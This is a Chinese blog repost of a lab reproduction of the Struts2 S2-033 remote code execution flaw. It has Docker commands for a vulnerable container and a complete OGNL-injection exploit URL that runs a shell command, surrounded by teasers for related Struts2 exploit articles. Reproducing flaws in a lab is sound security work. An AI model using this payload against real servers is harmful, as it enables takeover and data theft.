漏洞复现：Struts2 远程代码执行漏洞(S2-033)

最新推荐文章于 2024-09-21 16:31:24 发布

weixin_33752045

最新推荐文章于 2024-09-21 16:31:24 发布

阅读量376

点赞数

CC 4.0 BY-SA版权

文章标签： java 运维 json

原文链接：http://www.cnblogs.com/NBeveryday/p/8195140.html

本文介绍如何使用 Docker 构建 Struts2 S2-033 漏洞环境，并通过特定的 EXP 对其进行攻击测试。详细展示了从环境搭建到漏洞利用的全过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

docker pull medicean/vulapps:s_struts2_s2-033

`docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-033`

EXP:

http://127.0.0.1:8080/orders/4/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=id


参考：http://vulapps.evalbug.com/s_struts2_s2-033/

转载于:https://www.cnblogs.com/NBeveryday/p/8195140.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_33752045

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052（CVE-2017-9805）

qq_51577576的博客

12-15

1911

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052（CVE-2017-9805） Apache Struts2的REST插件存在远程代码执行的高危漏洞，其编号为CVE-2017-9805（S2-052）。Struts2 REST插件的XStream组件存在反序列化漏洞，使用XStream组件对XML格式的数据包进行反序列化操作时，未对数据内容进行有效验证，存在安全隐患，可被远程攻击。

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 （CVE-2010-1870）

qq_51577576的博客

10-14

1411

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 （CVE-2010-1870） s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12)，struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象，struts框架通过过滤#字符防止安全问题，然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制，对于S2-003漏洞，官方通过增加安全配置(禁止静态方法调用

参与评论您还未登录，请先登录后发表或查看评论

Strust2远程代码执行漏洞（S2-033）

玄道的网安博客

07-02

605

前言 Apache Strut2 REST插件存在漏洞，可以远程执行任意指令影响版本 Struts 2.3.20 – Struts 2.3.28 (不包括 2.3.20.3和 2.3.24.3)。环境搭建 docker pull medicean/vulapps:s_struts2_s2-033 docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-033 打开your-IP:80/orders即可看到页面漏洞利用 po

struts2_s2-033漏洞复现

qqbtou007的博客

07-25

320

1.利用vulapps搭建漏洞测试环境，直接docker拉起服务。通过修改command后的值完成命令执行。

S2-033漏洞分析

乐枕的家

06-14

1355

概述 item detail Impact of vulnerability Possible Remote Code Execution Maximum security rating High Recommendation Disable Dynamic Method Invocation if possible. Alternatively upgrade to

Strust2远程代码执行漏洞（S2-033）利用分析

煜铭2011

06-14

4535

5月12日，Struts官方发布安全公告称，Apache Strut2 REST插件存在漏洞，可以远程执行任意指令，该漏洞编号为S2-033（CVE-2016-3087 ），公告详情如下：启明星辰ADLab通过分析发现，该漏洞依附于前一段时间闹得沸沸扬扬的S2-032漏洞，Struts官方发布的S2-033安全公告只是针对性地对REST插件功能存在的安全问题进行补充，其漏洞技术

vulhub靶场搭建以及对于struts2漏洞s2-001的idea环境调试搭建,ctf.show的java(web279-web280)

wanan的博客

09-03

2308

vulhub靶场搭建以及对于struts2漏洞s2-001的idea环境调试搭建,ctf.show的java(web279-web280)

Apache Struts2远程代码执行漏洞(S2-001)复现

2401_87298694的博客

09-21

879

OGNL还支持处理集合即Map，List和Set。除了#，% 在 OGNL 表达式中也经常出现，它提供一个OGNL表达式运行环境。

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 （CVE-2012-0391）

qq_51577576的博客

10-15

1541

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 （CVE-2012-0391） S2-008 涉及多个漏洞，主要利用对传入参数没有严格限制，导致多个地方可以执行恶意代码。第一种情况其实就是 S2-007，在异常处理时的OGNL 执行第二种的cookie的方式，虽然在struts2没有对恶意代码进行限制，但是java的webserver（Tomcat），对cookie 的名称有较多限制，在传入struts2之前就被处理，从而较为鸡肋第三种需要开启devModedebug 模式。

Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包

03-23

2.如果您使用基于Jakarta插件，请升级到Apache Struts 2.3.32或2.5.10.1版本。（强烈推荐） 3.升级到2.3.32所用到的jar包： freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-...

Struts2远程命令执行漏洞解析

01-06

Struts2远程命令执行漏洞解析漏洞解析远程命令 Struts2

Struts2-032/033/037/devMode漏洞演示环境搭建

乐枕的家

07-29

5212

环境搭建安装Java(ubuntu自带的openjdk就行) 安装Tomcat apt-get install tomcat7 下载这个含漏洞版本的struts2(已验证) https://pan.baidu.com/s/1nvpkq5z 解压,将apps文件夹下的所有示例(.war)拷贝到Tomcat下(路径默认为/var/lib/tomcat7/webapps/) 启动tomcat servi

Struts(S2-037)远程代码执行漏洞预警

煜铭2011

06-16

8716

Struts(S2-037)远程代码执行 一、漏洞基本信息 CVE编号：CVE-2016-4438 漏洞名称：Struts(S2-037)远程代码执行 漏洞发布日期：2016.615 受影响的软件及系统：Apache struts 2.3.20 - 2.3.28.1 版本使用了REST插件的用户漏洞概述：Apache Struts 2是世界上最流行的Java Web服务器框

Apache Struts2远程代码执行漏洞(S2-037)复现

qq_36933272的博客

09-01

891

打开struts漏洞检测工具，输入地址，发现警告：存在Struts2远程代码执行漏洞-编号S2-046 返回验证标志：struts2_security_check 警告：存在Struts2远程代码执行漏洞-编号S2-045 返回验证标志：struts2_security_check 执行命令，ls查看目录，发现key.txt cat key.txt,得到key ...

墨者学院 - Apache Struts2远程代码执行漏洞(S2-005)复现

多崎巡礼的博客

09-17

2137

K8大佬神器一出 done

CTF-Apache Struts2远程代码执行漏洞(S2-037)复现

asd158923328的博客

08-22

1735

根据题意漏洞概述：Apache Struts 2是世界上最流行的Java Web服务器框架之一。Apache Struts2在使用REST插件的情况下，攻击者使用REST调用恶意表达式可以远程执行代码。该漏洞编号为CVE-2016-4438，目前命名为S2-037。,黑客可以利用漏洞直接执行任意代码，绕过文件限制，上传文件，执行远程命令，控制服务器，直接盗取用户的所有资料，该漏洞广泛影响所有s...

【S2-052】Struts2远程命令执行漏洞（CVE-2017-9805）

Unitue_逆流

10-13

6115

**操作机：**Windows 7**目标IP：**172.16.11.2:8080实验工具： Burp Suite：是用于攻击web 应用程序的集成平台。它包含了许多工具，并为这些工具设计了许多接口，以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息，持久性，认证，代理，日志，警报的一个强大的可扩展的框架，本次试验主要用到它的抓包改包功能。 Metasploit:一款

S2-012 远程代码执行漏洞检测与利用

Fly_鹏程万里

12-14

3121

前言漏洞环境改自vulhub的，环境地址 https://github.com/kingkaki/Struts2-Vulenv/tree/master/S2-012 漏洞信息 https://cwiki.apache.org/confluence/display/WW/S2-012 当发生重定向时，OGNL表达式会进行二次评估，导致之前在S2-003、S2-005、S2-009进...

Struts2 漏洞分析及如何提前预防

weixin_34080951的博客

05-01

856

2019独角兽企业重金招聘Python工程师标准>>> ...

struts2漏洞复现s2-009